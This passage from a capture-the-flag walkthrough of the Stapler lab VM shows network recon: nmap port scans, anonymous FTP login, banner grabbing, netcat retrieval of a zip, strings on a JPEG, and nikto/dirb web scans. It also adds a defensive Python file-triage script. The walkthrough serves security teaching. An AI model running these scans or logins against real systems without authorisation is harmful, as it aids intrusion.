<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">192.168.153.1 00:50:56:c0:00:01 1 60 VMware, Inc.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">192.168.153.142 00:0c:29:8b:3c:14 1 60 VMware, Inc.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">192.168.153.254 00:50:56:f8:e3:7b 1 60 VMware, Inc.</td></tr>
</tbody></table>
<br />
<h3>Enumeration</h3>
<span style="font-size: x-small;"><b>Command: </b>nmap -sS -Pn -p1-65535 192.168.153.142</span><br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">root@lulb0x:~# nmap -sS -Pn -p1-65535 192.168.153.142</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-24 15:26 EDT</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Nmap scan report for Red.Initech (192.168.153.142)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Host is up (0.00023s latency).</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Not shown: 65523 filtered ports</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">PORT STATE SERVICE</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">20/tcp closed ftp-data</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">21/tcp open ftp</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">8</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">22/tcp open ssh</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">9</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">53/tcp open domain</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">10</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">80/tcp open http</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">11</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">123/tcp closed ntp</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">12</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">137/tcp closed netbios-ns</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">13</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">138/tcp closed netbios-dgm</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">14</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">139/tcp open netbios-ssn</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">15</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">666/tcp open doom</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">16</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">3306/tcp open mysql</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">17</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">12380/tcp open unknown</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">18</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">MAC Address: 00:0C:29:8B:3C:14 (VMware)</td></tr>
</tbody></table>
Lots of fun stuff to play with.<br />
<br />
<h3><code>Service Exploration</code></h3>
<h3><code>FTP</code></h3>
<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">root@lulb0x:~# ftp 192.168.153.142</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Connected to 192.168.153.142.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">220-</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">220-|-----------------------------------------------------------------------------------------|</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">220-| Harry, make sure to update the banner when you get a chance to show who has access here |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">220-|-----------------------------------------------------------------------------------------|</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">220-</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">220</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">8</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Name (192.168.153.142:root): Anonymous</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">9</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">331 Please specify the password.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">10</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Password:</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">11</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">230 Login successful.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">12</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Remote system type is UNIX.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">13</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Using binary mode to transfer files.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">14</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">ftp> ls</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">15</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">200 PORT command successful. Consider using PASV.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">16</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">150 Here comes the directory listing.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">17</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 107 Jun 03 23:06 note</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">18</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">226 Directory send OK.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">19</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">ftp> get note</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">20</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">local: note remote: note</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">21</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">200 PORT command successful. Consider using PASV.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">22</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">150 Opening BINARY mode data connection for note (107 bytes).</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">23</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">226 Transfer complete.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">24</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">107 bytes received in 0.00 secs (50.0442 kB/s)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">25</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">ftp> exit</td></tr>
</tbody></table>
<br />
Interesting: a potential user, Harry. I will add him to the list of potential users.<br />
Reading our loot (note) reveals...
<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">root@lulb0x:~# cat note</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John. </td></tr>
</tbody></table>
Once again, more potential users: elly and john.<br />
With nothing more to see or do in the FTP realm at this time, we move on.<br />
<br />
<h3>
<span style="font-size: small;">SSH</span></h3>
<span style="font-size: small;">Usually there is nothing to gain from trying to SSH at this point, but I always connect just to see whether the banner (assuming there is one) has any hints that we can put away for later.</span><br />
<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">root@lulb0x:~# ssh 192.168.153.142</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-----------------------------------------------------------------</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">~ Barry, don't forget to put a message here ~</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-----------------------------------------------------------------</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">root@192.168.153.142's password:</td></tr>
</tbody></table>
Sweet, another potential user: barry. At this point we could try to brute force the SSH service, but I will hold off a bit longer just in case. No need to make more noise <span style="font-size: small;">at this point.</span><br />
<br />
<h3>
<span style="font-size: small;">666 - The port of the beast!!!</span></h3>
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">root@lulb0x:~# nc 192.168.153.142 666</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">PK d��Hp� ��, 2</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">message2.jpgUT +�QWJ�QWux</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">� �z</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">T ���P���A@� �UT�T � 2>��RDK �Jj�"DL[E�</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">0<Ĵ�ʮn���V �W�H �</td></tr>
</tbody></table>
Brutal... Looks like someone wants me to have a file of some sort. Let's dump the raw stream to disk and let file tell us what it is.<br />
Command: nc 192.168.153.142 666 &gt; Satanic_File<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">root@lulb0x:~/Documents/Stapler/Satans_Port# file Satanic_File</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Satanic_File: Zip archive data, at least v2.0 to extract</td></tr>
</tbody></table>
So our Satanic_File is a Zip archive (the PK at the start of the stream was the giveaway). Let's unzip it.<br />
Command: unzip Satanic_File.zip<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">root@lulb0x:~/Documents/Stapler/Satans_Port# unzip Satanic_File.zip</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Archive: Satanic_File.zip</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">inflating: message2.jpg</td></tr>
</tbody></table>
Unzipping it reveals a JPG, which displays a message:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw1kiFdFCCkekyas-8RFUHb1XaGhaczjz9QimB7BkKtBxVBtKoK6-pXaFLuO2Ed8WHM5ThEVpVlWZbWEhu4D8Am2xpJI7Z3syFcJSYFYdYo_SI0R7Xwj-D-uEyZLKiGEBAlp997JAw62w/s1600/message2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw1kiFdFCCkekyas-8RFUHb1XaGhaczjz9QimB7BkKtBxVBtKoK6-pXaFLuO2Ed8WHM5ThEVpVlWZbWEhu4D8Am2xpJI7Z3syFcJSYFYdYo_SI0R7Xwj-D-uEyZLKiGEBAlp997JAw62w/s320/message2.jpg" width="320" /></a></div>
Great, yet another potential user: scott<br />
Now, I have been burned a couple of times in these VMs by not checking the JPGs for hidden messages, so I always run strings on the images.<br />
Command: strings message2.jpg<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">JFIF</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">vPhotoshop 3.0</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">8BIM</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">1If you are reading this, you should get a cookie!</td></tr>
</tbody></table>
If you are reading this you should get a cookie... no thanks, I don't eat cookies, I steal them :) It seems there is nothing else to do with Satan's port, so we move along.<br />
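The same port-666 triage as an added example in Python (this is my code, not the original post's): pull the raw stream the way nc host port &gt; file does, identify it by its magic bytes rather than by whatever extension we gave it, unpack it in memory while refusing member names that would escape the directory, and run a strings-style scan over each member. The host and port are assumptions and are only used if you call pull_port yourself; the blob the script triages is constructed inline (a zip holding a headers-only JPEG whose Photoshop 8BIM segment carries a text payload), so it runs offline.<br />

```python
"""Added example, not from the original post: triage a blob pulled from a raw
TCP port the way `nc host port > file; file; unzip; strings` did above.
Host/port are assumptions; the blob below is constructed in memory."""
import io
import socket
import zipfile

# Magic bytes are a more honest identifier than an extension the attacker chose.
MAGIC = {
    b"PK\x03\x04": "zip",
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"\x1f\x8b": "gzip",
}


def pull_port(host: str, port: int, timeout: float = 5.0) -> bytes:
    """Equivalent of `nc host port > file`: read until the server closes."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        while True:
            data = sock.recv(65536)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def identify(blob: bytes) -> str:
    for magic, name in MAGIC.items():
        if blob.startswith(magic):
            return name
    return "unknown"


def strings(blob: bytes, min_len: int = 4) -> list:
    """Same idea as strings(1): runs of printable ASCII at least min_len long."""
    out, run = [], bytearray()
    for byte in blob:
        if 32 <= byte < 127:
            run.append(byte)
            continue
        if len(run) >= min_len:
            out.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= min_len:
        out.append(run.decode("ascii"))
    return out


def unpack_zip(blob: bytes) -> dict:
    """Extract members in memory, refusing names that could escape a directory."""
    members = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            parts = info.filename.replace("\\", "/").split("/")
            if info.filename.startswith(("/", "\\")) or ".." in parts:
                raise ValueError(f"refusing suspicious member name: {info.filename!r}")
            members[info.filename] = zf.read(info)
    return members


def triage(blob: bytes) -> dict:
    """{member name: strings found}; a non-zip blob is scanned as-is under '-'."""
    if identify(blob) != "zip":
        return {"-": strings(blob)}
    return {name: strings(data) for name, data in unpack_zip(blob).items()}


def build_sample(member_name: str = "message2.jpg") -> bytes:
    """Constructed stand-in for what port 666 served: a zip holding a headers-only
    JPEG whose APP13 (Photoshop 3.0 / 8BIM) segment carries an IPTC text payload.
    The length bytes that precede 'Photoshop' and the payload are printable, which
    is why strings(1) shows a stray leading character ('vPhotoshop', '1If you')."""
    jpeg = (
        b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
        b"\xff\xed\x00\x4ePhotoshop 3.0\x00"          # APP13, length 0x4e
        b"8BIM\x04\x04\x00\x00\x00\x00\x00\x31"        # resource 0x0404, size 49
        b"If you are reading this, you should get a cookie!\x00"
        b"\xff\xd9"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(member_name, jpeg)
    return buf.getvalue()


if __name__ == "__main__":
    # Against the live VM this would be: blob = pull_port("192.168.153.142", 666)
    blob = build_sample()
    print("type:", identify(blob))
    for member, found in triage(blob).items():
        print(member, "->", found)
```

The zip-slip check matters more than it looks: zipfile.ZipFile.read() does not sanitise member names, so a member called ../something written to disk by a less careful script lands outside the working directory.<br />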
<br />
<h3>
Port 12380</h3>
Figuring out what port 12380 serves with netcat was pretty simple: it speaks plain HTTP and hands back a web page.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEim3E-cvq_OXhV6p-XvEnWdd6LBYA3Rz781HM-LAUW29f38AiV-FhcxEggEiZAN1Puj4iXSv3PsDQwB5ZN4Xg8GcKXc5sDDUYV-WM7iU0lIkY-JRFZ8NcX49bAg8pF-6sdzaZRPLADY3t4/s1600/New+Bitmap+Image.bmp" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEim3E-cvq_OXhV6p-XvEnWdd6LBYA3Rz781HM-LAUW29f38AiV-FhcxEggEiZAN1Puj4iXSv3PsDQwB5ZN4Xg8GcKXc5sDDUYV-WM7iU0lIkY-JRFZ8NcX49bAg8pF-6sdzaZRPLADY3t4/s640/New+Bitmap+Image.bmp" width="640" /></a></div>
Interesting: a web page with three more people's names:<br />
dave<br />
tim<br />
zoe<br />
<br />
<h3>
<span style="font-size: small;">Port 80 / 12380: HTTP(S)</span></h3>
<br />
Since 12380 turned out to be a web server, we can run nikto and dirb (or dirbuster) against both web ports. Port 80 first:<br />
Command: nikto -host 192.168.153.142; dirb http://192.168.153.142<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">root@lulb0x:~/Documents/Stapler# nikto -host 192.168.153.142; dirb http://192.168.153.142</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">- Nikto v2.1.6</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">---------------------------------------------------------------------------</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Target IP: 192.168.153.142</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Target Hostname: 192.168.153.142</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Target Port: 80</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Start Time: 2016-06-27 10:56:46 (GMT-4)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">---------------------------------------------------------------------------</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">8</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Server: No banner retrieved</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">9</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ The anti-clickjacking X-Frame-Options header is not present.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">10</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">11</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">12</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ No CGI Directories found (use '-C all' to force check all possible dirs)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">13</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">14</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">15</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">16</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">17</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ End Time: 2016-06-27 10:56:58 (GMT-4) (12 seconds)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">18</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">---------------------------------------------------------------------------</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">19</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ 1 host(s) tested</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">20</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-----------------</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">21</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">DIRB v2.22</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">22</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">By The Dark Raver</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">23</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-----------------</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">24</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">START_TIME: Mon Jun 27 10:56:58 2016</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">25</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">URL_BASE: http://192.168.153.142/</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">26</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">27</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-----------------</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">28</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">GENERATED WORDS: 4612</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">29</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">---- Scanning URL: http://192.168.153.142/ ----</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">30</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ http://192.168.153.142/.bashrc (CODE:200|SIZE:3771)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">31</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ http://192.168.153.142/.profile (CODE:200|SIZE:675)</td></tr>
